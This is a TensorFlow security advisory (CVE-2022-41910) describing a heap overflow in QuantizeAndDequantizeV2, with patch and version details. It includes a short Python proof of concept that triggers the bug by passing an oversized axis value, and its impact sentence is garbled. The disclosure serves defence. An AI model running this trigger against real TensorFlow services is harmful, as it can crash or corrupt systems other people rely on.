## TFSA-2022-168: Heap overflow in `QuantizeAndDequantizeV2`

### CVE Number
CVE-2022-41910

### Impact
The function [QuantizeAndDequantizeV2/V3/V4Grad](https://https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ops/array_ops.cc) an `axis` less than `kint32max`, or its shape inference can have address sanitizer issues.
```python
import tensorflow as tf
@tf.function
def test():
    tf.raw_ops.QuantizeAndDequantizeV2(input=[2.5],
    								   input_min=[1.0],
    								   input_max=[10.0],
    								   signed_input=True,
    								   num_bits=1,
    								   range_given=True,
    								   round_mode='HALF_TO_EVEN',
    								   narrow_range=True,
    								   axis=0x7fffffff)
test()
```

### Patches
We have patched the issue in GitHub commit [7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb](https://github.com/tensorflow/tensorflow/commit/7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb).

The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported through the OSS VRP program.
